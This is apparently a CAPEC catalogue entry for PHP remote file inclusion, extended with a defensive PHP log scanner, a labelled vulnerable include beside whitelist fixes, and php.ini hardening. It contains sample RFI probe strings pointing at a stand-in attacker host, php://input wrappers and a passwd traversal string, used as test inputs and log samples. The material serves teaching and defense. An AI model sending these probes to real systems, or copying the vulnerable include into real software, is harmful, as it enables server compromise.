CAPEC-193 - PHP Remote File Inclusion

In this pattern the attacker is able to make the application load and execute arbitrary code fetched from a remote location the attacker controls. This is usually accomplished through an insecurely configured PHP runtime (one that lets the "include"/"require" constructs open URLs) combined with an improperly sanitized "include" or "require" call whose argument the user controls and can point at any web-accessible file. This allows attackers to hijack the targeted application and force it to execute their own instructions.


  • Attack Methods (1): Injection
  • Purposes (2): Exploitation, Penetration
  • Scopes (7):
      • Modify files or directories (Integrity)
      • Read files or directories (Confidentiality)
      • Modify application data (Integrity)
      • Read application data (Confidentiality)
      • Execute unauthorized code or commands (Authorization)
      • Gain privileges / assume identity (Non-Repudiation, Authorization, Authentication, Accountability)
      • Bypass protection mechanism (Authorization, Access_Control)

Low skill level: To inject the malicious payload into a web page

Medium skill level: To bypass filters in the application

The target application server must allow remote files to be included by the "require", "include", etc. PHP directives (in PHP this is governed by the allow_url_include setting, which only takes effect when allow_url_fopen is also enabled)

Ability to send HTTP requests to the web application

Ability to store PHP scripts on a server that the target can reach over the network

Explore: Step 1 - Survey application

Using a browser or an automated tool, the attacker follows all public links on the web site and records every link found.

Technique ID: 1 - Environment(s) env-Web

Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.

Technique ID: 2 - Environment(s) env-Web

Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that use the GET method rather than POST.

Technique ID: 3 - Environment(s) env-Web

Use a browser to manually explore the website and analyze how it is constructed. Many browser plugins are available to facilitate the analysis or automate URL discovery.

Indicator ID: 1 - Environment(s) env-Web

Type: Positive

URL parameters are used by the application

Indicator ID: 2 - Environment(s) env-Web

Type: Inconclusive

Using URL rewriting, parameters may be part of the URL path.

Indicator ID: 3 - Environment(s) env-Web

Type: Inconclusive

No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided.

Indicator ID: 4 - Environment(s) env-Web

Type: Negative

Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.


Security Control ID: 1

Type: Detective

Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).

Security Control ID: 2

Type: Detective

Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.

Security Control ID: 3

Type: Preventative

Use CAPTCHA to prevent the use of the application by an automated tool.

Security Control ID: 4

Type: Preventative

Actively monitor the application and either deny or redirect requests from origins that appear to be automated.


Outcome ID: 1

Type: Success

A list of URLs, with their corresponding parameters is created by the attacker.



Experiment: Step 1 - Attempt variations on input parameters

The attack variants make use of a remotely hosted PHP script that produces a uniquely identifiable output when executed on the target application server. Possibly using an automated tool, the attacker requests variations on the inputs surveyed earlier, sending parameter values that contain variants of remote file inclusion payloads referencing the remote PHP script, and records every server response that contains the output of that script.

Technique ID: 1 - Environment(s) env-Web

Use a list of probe strings to inject into the parameters of known URLs. The probe strings are variants of PHP remote file inclusion payloads that reference the attacker-controlled remote PHP script.

Technique ID: 2 - Environment(s) env-Web

Use a proxy tool to record the results of manually entering remote file inclusion probes into known URLs.

Indicator ID: 1 - Environment(s) env-Web

Type: Positive

The output of the remote PHP script is included in the response web page.

Indicator ID: 2 - Environment(s) env-Web

Type: Inconclusive

Nothing is returned in the web page. The payload script might have been executed in a different context whose output is not included in the response page.

Indicator ID: 3 - Environment(s) env-All

Type: Negative

The application returns an error associated with the inclusion of the remote file (for example a PHP warning that the http:// wrapper is disabled in the server configuration by allow_url_include=0).

Indicator ID: 4 - Environment(s) env-All

Type: Negative

The application server doesn't download the remote PHP script.


Security Control ID: 1

Type: Detective

Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard Remote File Inclusion (RFI) probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that adversaries use.

Security Control ID: 2

Type: Preventative

Apply appropriate input validation to filter all user-controllable input

Security Control ID: 3

Type: Preventative

When possible, configure the PHP runtime environment to prevent the execution of remote PHP scripts (allow_url_include = Off, and allow_url_fopen = Off unless the application legitimately opens URLs)

Security Control ID: 4

Type: Preventative

Actively monitor the application and either deny or redirect requests from origins that appear to be generating RFI probes.

Security Control ID: 5

Type: Preventative

When possible, only use the "include", "require", etc. PHP directives with statically defined strings


Outcome ID: 1

Type: Success

The attacker's script is executed on the application server and its output is delivered somewhere on the web site (if not on the same web page)

Outcome ID: 2

Type: Inconclusive

The remote PHP script does not appear to have been executed by the application server. Execution can still be confirmed out of band: for example, the remote PHP script can make an HTTP request to an attacker-controlled web server, so that if it does run on the application server the attacker finds evidence in that web server's access log.

Outcome ID: 3

Type: Failure

No access to the remote PHP script has been recorded in the access log of the web server hosting it



Exploit: Step 1 - Run arbitrary server-side code

Once the attacker succeeds in exploiting the vulnerability, he is able to execute server-side code within the application. The malicious code has effectively the same access to resources as the targeted application. Note that the attacker's script can also invoke shell commands (for example through system() or exec()) and run them on the server with the same privileges as the PHP runtime.

Technique ID: 1 - Environment(s) env-All

Develop a malicious PHP script and have the application server execute it through the inclusion vectors identified during the Experiment phase.

Security Control ID: 1

Type: Detective

Monitor server logs for parameters containing URL with references to remote content
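The log-based controls in this entry (Security Control 1 of the Explore step, which watches request velocity, and Security Control 1 of the Experiment step and of this step, which alert on parameters referencing remote content) can be implemented with a short log-analysis script. The following PHP CLI script is an added example, not part of the CAPEC entry and not any vendor's product: it parses constructed Apache combined-format lines, flags query parameters that decode (once or twice) to a URL or PHP stream-wrapper reference, and flags clients whose request spacing is too fast and too regular to be a human. The log lines, the scheme list and the thresholds (mean gap of at most 2 s, coefficient of variation at most 0.25, at least five requests) are assumptions.

```php
<?php
// Added example; not CAPEC text and not any vendor's code.  Implements the
// detective controls of CAPEC-193 over constructed Apache combined-format
// log lines.  Scheme list, thresholds and sample lines are assumptions.

const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /';
// Schemes that PHP's URL-aware stream wrappers would honour in include/require.
const WRAPPER_RE = '#\b(?:https?|ftps?|php|data|expect|phar)://#i';

function parse_line(string $line): ?array
{
    if (!preg_match(LOG_RE, $line, $m)) {
        return null;
    }
    $ts = DateTime::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    return ['ip' => $m[1], 'time' => $ts ? $ts->getTimestamp() : 0,
            'method' => $m[3], 'path' => $m[4], 'status' => (int) $m[5]];
}

// Control: alert on parameters whose value references remote content or a wrapper.
function rfi_probe_params(string $path): array
{
    $qpos = strpos($path, '?');
    if ($qpos === false) {
        return [];
    }
    $hits = [];
    foreach (explode('&', substr($path, $qpos + 1)) as $pair) {
        [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
        // Decode twice: probes are often double-encoded to evade naive filters.
        if (preg_match(WRAPPER_RE, rawurldecode(rawurldecode($value)))) {
            $hits[] = rawurldecode($name);
        }
    }
    return $hits;
}

// Control: humans click slowly and irregularly, tools quickly and regularly.
// Flag a client whose mean gap <= $maxMeanGap seconds and whose gaps have a
// coefficient of variation (sd / mean) <= $maxCv over >= $minRequests hits.
function automated_clients(array $events, float $maxMeanGap = 2.0,
                           float $maxCv = 0.25, int $minRequests = 5): array
{
    $byIp = [];
    foreach ($events as $e) {
        $byIp[$e['ip']][] = $e['time'];
    }
    $flagged = [];
    foreach ($byIp as $ip => $times) {
        if (count($times) < $minRequests) {
            continue;
        }
        sort($times);
        $gaps = [];
        for ($i = 1; $i < count($times); $i++) {
            $gaps[] = $times[$i] - $times[$i - 1];
        }
        $mean = array_sum($gaps) / count($gaps);
        $var = 0.0;
        foreach ($gaps as $g) {
            $var += ($g - $mean) ** 2;
        }
        $cv = $mean > 0 ? sqrt($var / count($gaps)) / $mean : 0.0;
        if ($mean <= $maxMeanGap && $cv <= $maxCv) {
            $flagged[$ip] = ['requests' => count($times), 'mean_gap' => $mean, 'cv' => $cv];
        }
    }
    return $flagged;
}

function scan(array $lines): array
{
    $events = [];
    $probes = [];
    foreach ($lines as $line) {
        $e = parse_line($line);
        if ($e === null) {
            continue;
        }
        $events[] = $e;
        $params = rfi_probe_params($e['path']);
        if ($params !== []) {
            $probes[] = ['ip' => $e['ip'], 'params' => $params, 'path' => $e['path']];
        }
    }
    return ['probes' => $probes, 'automated' => automated_clients($events)];
}

// Constructed log lines: one client walking a parameter with RFI probes in
// plain, single- and double-encoded form plus a wrapper; one human visitor.
$sampleLog = [
    '203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "curl/8.4.0"',
    '203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /index.php?page=http://203.0.113.99/p.txt? HTTP/1.1" 200 640 "-" "curl/8.4.0"',
    '203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "GET /index.php?page=http%3A%2F%2F203.0.113.99%2Fp.txt%3F HTTP/1.1" 200 640 "-" "curl/8.4.0"',
    '203.0.113.7 - - [10/Mar/2024:12:00:04 +0000] "GET /index.php?page=%2568ttp%253A%252F%252F203.0.113.99%252Fp.txt%253F HTTP/1.1" 200 640 "-" "curl/8.4.0"',
    '203.0.113.7 - - [10/Mar/2024:12:00:05 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 640 "-" "curl/8.4.0"',
    '198.51.100.4 - - [10/Mar/2024:12:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Mar/2024:12:00:47 +0000] "GET /contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
];

$result = scan($sampleLog);
foreach ($result['probes'] as $p) {
    printf("RFI probe from %s in [%s]: %s\n", $p['ip'], implode(',', $p['params']), $p['path']);
}
foreach ($result['automated'] as $ip => $s) {
    printf("automated client %s: %d requests, mean gap %.2fs, cv %.2f\n", $ip, $s['requests'], $s['mean_gap'], $s['cv']);
}
```

On the sample above the four probe lines from 203.0.113.7 are reported (the `home` request is not), and 203.0.113.7 is also flagged as automated because its five requests arrive exactly one second apart; the two-request visitor is below the minimum count. In production the same two functions would run over the live access log or the web server's request stream, and the wrapper list should be kept in step with the wrappers enabled in the PHP build.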

Security Control ID: 2

Type: Preventative

Apply appropriate input validation to filter all user-controllable input

Security Control ID: 3

Type: Preventative

When possible, configure the PHP runtime environment to prevent the execution of remote PHP scripts (allow_url_include = Off, and allow_url_fopen = Off unless the application legitimately opens URLs)

Security Control ID: 4

Type: Preventative

When possible, only use the "include", "require", etc. PHP directives with statically defined strings


Outcome ID: 1

Type: Success

The attacker's script is being executed on the application server



Implementation: Perform input validation for all input, including remote and user-generated content

Implementation: Only allow known files to be included (whitelist)

Implementation: Make use of indirect references passed in URL parameters instead of file names
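The vulnerable pattern described in the introduction and the two implementation mitigations just listed (whitelist, indirect references) are shown side by side below. This is an added example, not CAPEC text and not code from any project: the "page" parameter name, the pages/ directory and the two lookup tables are assumptions for illustration.

```php
<?php
// Added example; not CAPEC text and not code from any project.  Shows the
// include pattern CAPEC-193 targets beside the two fixes named above
// (allowlist, indirect references).  The "page" parameter, the pages/
// directory and the lookup tables are assumptions for illustration.

// VULNERABLE: the include target is assembled from request data.  With
// allow_url_include=On a request such as
//   index.php?page=http://attacker.example/probe.txt%3F
// makes the server download and execute probe.txt (the encoded "?" turns the
// appended ".php" into a query string that the attacker's server ignores).
function render_vulnerable(string $page): void
{
    include $page . '.php';
}

// FIX 1 (whitelist): request data is only ever a key into a fixed table, so no
// path, URL or wrapper supplied by the client can reach include().
const PAGES = [
    'home'  => 'pages/home.php',
    'about' => 'pages/about.php',
];

function resolve_by_name(?string $requested): ?string
{
    $key = $requested ?? 'home';
    return PAGES[$key] ?? null;          // unknown key -> null, never a path
}

// FIX 2 (indirect reference): the URL carries an opaque numeric id; file names
// never appear in the request at all.
const PAGE_IDS = [
    1 => 'pages/home.php',
    2 => 'pages/about.php',
];

function resolve_by_id(?string $id): ?string
{
    if ($id === null || !preg_match('/^[0-9]{1,6}\z/', $id)) {
        return null;                     // not a short decimal id -> rejected
    }
    return PAGE_IDS[(int) $id] ?? null;
}

// The only include() left in the router takes a value from our own tables.
function render(?string $file): void
{
    if ($file === null) {
        http_response_code(404);
        echo "Unknown page\n";
        return;
    }
    include $file;
}

// Constructed inputs: valid keys, typical RFI probes, a PHP stream wrapper,
// a traversal attempt and an unknown id.  Only the table keys resolve.
$inputs = [
    'home', 'about', '2', '99',
    'http://attacker.example/probe.txt?',
    'http://attacker.example/probe.txt%3F',
    'php://input',
    '../../../etc/passwd',
];
foreach ($inputs as $in) {
    printf("%-40s by_name=%-7s by_id=%s\n", $in,
        resolve_by_name($in) === null ? 'reject' : 'ok',
        resolve_by_id($in) === null ? 'reject' : 'ok');
}
// In the real router: render(resolve_by_name($_GET['page'] ?? null));
```

Run with `php` on the command line to see which inputs resolve: only `home` and `about` pass the name table and only `2` passes the id table; every URL, wrapper and traversal string is rejected before any include() runs. Either resolver alone closes the remote inclusion; the id form is preferable where file names would otherwise leak the server layout.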

Configuration: Ensure that remote scripts cannot be included by the "include" or "require" PHP directives (allow_url_include = Off)
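The configuration mitigation, shown as an added example rather than CAPEC text, with the weak setting beside the hardened one. The settings themselves are PHP's own (allow_url_include and allow_url_fopen); the deployment mechanisms named in the comments are the standard ones for php.ini, php-fpm and mod_php.

```ini
; Added example, not CAPEC text.  Set in php.ini, in a php-fpm pool
; (php_admin_flag[allow_url_include] = off) or in an Apache mod_php
; <Directory> block (php_admin_flag allow_url_include off).  Both directives
; are PHP_INI_SYSTEM, so a runtime ini_set() cannot change them.

; WEAK: include/require accept URL wrappers, the precondition for CAPEC-193.
allow_url_fopen   = On
allow_url_include = On

; HARDENED: include/require refuse remote targets.  allow_url_include has
; defaulted to Off since it was introduced in PHP 5.2 and is deprecated as of
; PHP 7.4; remote inclusion needs both directives On, so either one Off
; closes the vector.
allow_url_include = Off
; allow_url_fopen governs fopen()/file_get_contents() on URLs; turn it Off
; unless the application legitimately fetches URLs.
allow_url_fopen   = Off
```

Verify in the SAPI that actually serves the application (CLI, php-fpm and mod_php can load different php.ini files), for example with `php -i | grep allow_url` on the CLI or phpinfo() behind the web server. This removes only the remote variant: the include target must still never be derived from request data, which is what the implementation mitigations above address.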